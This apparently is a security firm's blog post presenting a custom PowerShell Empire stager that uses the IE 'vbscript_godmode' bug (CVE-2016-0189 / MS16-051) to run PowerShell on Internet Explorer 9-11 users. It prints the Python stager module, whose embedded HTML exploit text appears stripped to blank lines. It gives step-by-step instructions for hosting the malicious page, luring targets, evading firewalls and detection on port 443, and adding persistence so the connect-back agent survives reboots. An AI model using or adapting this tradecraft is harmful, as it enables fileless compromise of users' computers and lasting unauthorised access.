Powershell Empire is one of our all time favourite tools for engagements where targeting users is in scope, however we generally use a combination of Metasploit and Empire to get the job done, using browser exploits in conjunction with the standard stagers included with Empire.
On a recent test we did not have the option to use MSF, instead we hacked together a new stager for Empire which would leverage CVE-2016-0189 (also known as vbscript_godmode) to target users of Internet explorer 9 – 11. This has been our go-to exploit for 6 or so months and has recently started hitting exploit kits. If successful, powershell will be launched and an agent will connect back to Empire. Nothing will be dropped on disk.
from lib.common import helpers
class Stager:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'MS16-051 IE RCE',
'Author': ['www.cgsec.co.uk'],
'Description': ('Leverages MS16-051 to execute powershell in unpatched browsers. This is a file-less vector which works on IE9/10/11 and all versions of Windows'),
'Comments': [
'Target will have to open link with vulnerable version of IE.'
]
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Listener' : {
'Description' : 'Listener to generate stager for.',
'Required' : True,
'Value' : ''
},
'StagerRetries' : {
'Description' : 'Times for the stager to retry connecting.',
'Required' : False,
'Value' : '0'
},
'OutFile' : {
'Description' : 'File to output HTML to, otherwise displayed on the screen.',
'Required' : True,
'Value' : ''
},
'Base64' : {
'Description' : 'Switch. Base64 encode the powershell output.',
'Required' : True,
'Value' : 'True'
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
# extract all of our options
listenerName = self.options['Listener']['Value']
base64 = self.options['Base64']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
stagerRetries = self.options['StagerRetries']['Value']
encode = False
if base64.lower() == "true":
encode = True
# generate the launcher code
launcher = self.mainMenu.stagers.generate_launcher(listenerName, encode=encode, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries)
if launcher == "":
print helpers.color("[!] Error in launcher command generation.")
return ""
else:
code = "\n"
code += "\n"
code += "\n"
code += "\n"
code += "\n"
code += " \n"
code += " \n"
code += " \n"
code += "\n"
code += ""
return code
ms16.py
First we will grab Empire, available on Github.
Now we have Empire downloaded, we will install apache2 so we can throw the index page out directly to /var/www/html. This step is optional as most will want to alter the output, obfuscating it to evade AV’s or similar.
Time to add our new stager, these are located in /lib/stagers and running the Empire install.sh script to get it up and running. If you are running Ubuntu, you will need to manually install pip before running this script.
Now we are ready to start Empire for the first time. If everything is well we should be able to “usestager ms16”, set our output file to /var/www/html/index.html and be ready to direct targets to it. More advanced users may want to set up something slightly more elaborate to serve different vectors to different clients or obfuscate the exploit, this is outside the scope of this article however.
My personal preference is to set the listener to port 443 in hopes of bypassing certain firewalls and evading some detection mechanisms.
Now to generate our malicious HTML.
Now when your server is visited by somebody with a vulnerable browser, the exploit should trigger and you will be presented with a new agent in Empire. It is normally a good idea to use the persistence modules to create a scheduled task or similar to ensure you do not lose access on reboot. These can be set to automatically run as a new client connects by setting the Agent to autorun.
Share this:
- Click to share on Facebook (Opens in new window)
- Click to share on Google+ (Opens in new window)
- Click to share on LinkedIn (Opens in new window)
- Click to share on Telegram (Opens in new window)
- Share on Skype (Opens in new window)
- Click to share on WhatsApp (Opens in new window)
-
Related
Keeping Your Client's Data Safe Over The Cloud07/22/2016In "Guest Posts"
Social Engineering - Why I Think Your Business Should Care07/20/2016In "Guest Posts"
Social Engineering - Our Take08/18/2016In "Tech Writing"
thanks